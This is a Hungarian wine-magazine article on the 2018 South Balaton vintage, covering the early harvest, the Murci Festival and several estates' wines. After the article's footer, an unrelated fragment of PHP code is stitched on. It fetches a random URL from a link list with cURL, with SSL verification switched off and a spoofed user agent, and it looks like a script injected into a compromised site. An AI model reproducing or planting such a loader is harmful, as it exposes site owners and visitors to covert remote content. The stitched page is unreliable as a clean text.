Remek évjárat a Dél-Balatonnál

Minden szempontból különleges szüretet tudhatnak maguk mögött a dél-balatoni szőlősgazdák. Az áprilisi nyárnak köszönhetően nagyon korán ládákba, majd palackokba kerültek az illatos fehérek, a kékszőlőket pedig a hosszú, meleg ősz érlelte kivételes minőségűvé. A hozamkorlátozás ellenére is bőséges termés érkezett a feldolgozókba, így biztos, hogy lesz miből választanunk, ha gyümölcsös borokra szomjazunk. Csepe Erika írása.... View Article


Minden szempontból különleges szüretet tudhatnak maguk mögött a dél-balatoni szőlősgazdák. Az áprilisi nyárnak köszönhetően nagyon korán ládákba, majd palackokba kerültek az illatos fehérek, a kékszőlőket pedig a hosszú, meleg ősz érlelte kivételes minőségűvé. A hozamkorlátozás ellenére is bőséges termés érkezett a feldolgozókba, így biztos, hogy lesz miből választanunk, ha gyümölcsös borokra szomjazunk. Csepe Erika írása.

Fotó: Furmint Photo

Talán mindenki emlékszik még rá, hogy a téli hónapok után milyen hirtelen robbant be áprilisban a meleg. A szokatlan időjárás májusi szőlővirágzást hozott, és ez már előre is vetítette a korai szüretet. Július utolsó napjaiban – elsősorban a korai fajtákkal – a Balaton déli partjánál szinte mindenhol beindultak a munkák. És nem csak a pezsgő-alapanyagokkal kellett sietniük a gazdáknak. A csendes boroknak szánt szőlőket is a megszokottnál körülbelül két héttel előbb kellett szüretelniük.

Nem véletlen, hogy ha arra kérjük a borászokat, egyetlen szóval mondják el, milyen volt az idei szüret, akkor szinte kivétel nélkül azt vágják rá, hogy gyors. Egyrészt azért, mert a korai érés miatt nagyon sok fajtát kellett egyszerre szüretelniük, másrészt pedig, mert bőséges terméssel ajándékozta meg az idei év őket, még a hozamkorlátozások ellenére is. Éppen ezért az időzítés volt a legfontosabb dolguk az idei szüret során. Ám aki időben lépett, megőrizhette a vidékre oly jellemző gyümölcsös ízeket úgy, hogy az alkoholtartalom sem szaladt el, és a savak is megmaradtak.

A korai szüret egyébként nemcsak a szőlőkben és a feldolgozókban állította kihívás elé a dél-balatoni borászokat, hanem a fesztiválokon is. Szeptember elején még kérdéses volt például, hogy az október végén megrendezendő Murci Fesztiválra marad-e murci egyáltalán. (A murci az az erjedésben lévő ital, amely átmenetet képez a must és a kész bor között. Még szénsavas, de már van alkoholtartalma, és különleges íze miatt sokan szívesen fogyasztják.) A fesztivál szerencsére nem maradt el, sőt sikerrel zárult, hiszen a későbbi fajtákból tudtak murcit kínálni, de az ősz elején ezt még remélni sem merték.

Fotó: Furmint Photo

Az ütemezés egyébként a szüret vége felé is lényegesnek bizonyult. Jól jártak például azok a gazdák, akik egyes kékszőlő fajtákat a szép, hosszú őszre tekintettel sokáig a tőkén hagytak. A Garamvári Szőlőbirtoknál a cabernet sauvignont szüretelték viszonylag későn, és úgy tűnik, ezzel nagyon jó döntést hoztak: biztos, hogy idén lesz prémium minőségű cabernet boruk, hiszen gyönyörűen beérett a szőlő.

Nagy reményeket fűznek Prémium Sauvignon Blanc borukhoz is, mely nemsokára már kapható is lesz. Ez egy igazán szokatlan tétel, ugyanis a neve ellenére egy cuvée-t takar. Ám ennél nem különböző fajtákat házasítottak, hanem más és más eljárással készült sauvignon blanc-okat. A borhoz a szőlőket különböző területről szüretelték, ráadásul eltérő időpontokban. Az erjedéshez többféle élesztőt használtak, végül a kész sauvignon blanc borokat házasították össze. A végeredmény egy igazán „szerethető” tétel lett, szép sav-alkohol egyensúllyal, mind illatában, mind ízében gazdag gyümölcsösséggel.

És ha már szokatlan megoldásokról van szó, meg kell említeni Pócz József Cabernet Franc-ját is. Ez a franc ugyanis 2016 óta nem kerül hordóba, tartályban erjed és ott is érlelődik. A 2018-as tétel persze még nincs kész, pihennie, alakulnia kell, de már most elmondható róla, hogy rendkívül gyümölcsös, jól iható. Ízében érett meggy, cseresznye, bors és némi földes jegyek bukkannak fel. A hordófűszerek hiányoznak belőle, de a körfejtésnek köszönhetően a markáns tanninok nem. Gazdag, rusztikus és hosszú lecsengésű tétel.

Fotó: Furmint Photo

A gyümölcsösség egyébként az egyik ismertetőjegye a dél-balatoni boroknak. Köszönhető ez egyrészt a löszös talajnak, a magyar tenger közelségének, az uralkodó északi széliránynak, valamint a magasabb páratartalomnak, ami megakadályozza, hogy perzselő forróság legyen. A különleges viszonyok miatt egyre többen készítenek a különféle habzó- és gyöngyöző borok mellett tradicionális pezsgőket is a vidéken. Idén debütált például a Bujdosó Pincészet Rosé Brut pezsgője, amely pinot noir és királyleányka házasításával készült. A pezsgő valóságos gyümölcsbomba, illatában az epret és a barackot idézi, és mivel nem teljesen száraz, ízében is a gyümölcsös jegyek dominálnak elsősorban, nem a tradicionális pezsgőknél megszokott kekszesség, élesztősség. Könnyed karaktere ellenére fogyasztása nemcsak nyáron, hanem bármely évszakban ajánlott.

A dél-balatoni borok egyébként egyre jobban szerepelnek a versenyeken is. Az idei, Balatoni Borok Versenyén például a díjak 70 százaléka a délieknél landolt. Egyre többen kíváncsiak is ezekre a borokra, hiszen a fesztiválok látogatottsága folyamatosan nő, nyáron pedig sokan hagyják ott a vízpartot egy-egy bortúra kedvéért, annak ellenére – vagy éppen pont amiatt –, hogy a helyi éttermek borlapján már főként a közeli pincészetek borai szerepelnek. A dél-balatoni boroknak a sokszínűség az erőssége, így biztos, hogy az idei évjárat tételei között is mindenki talál majd kedvére valót.

(Visited 4 times, 5 visits today)

The post Remek évjárat a Dél-Balatonnál appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>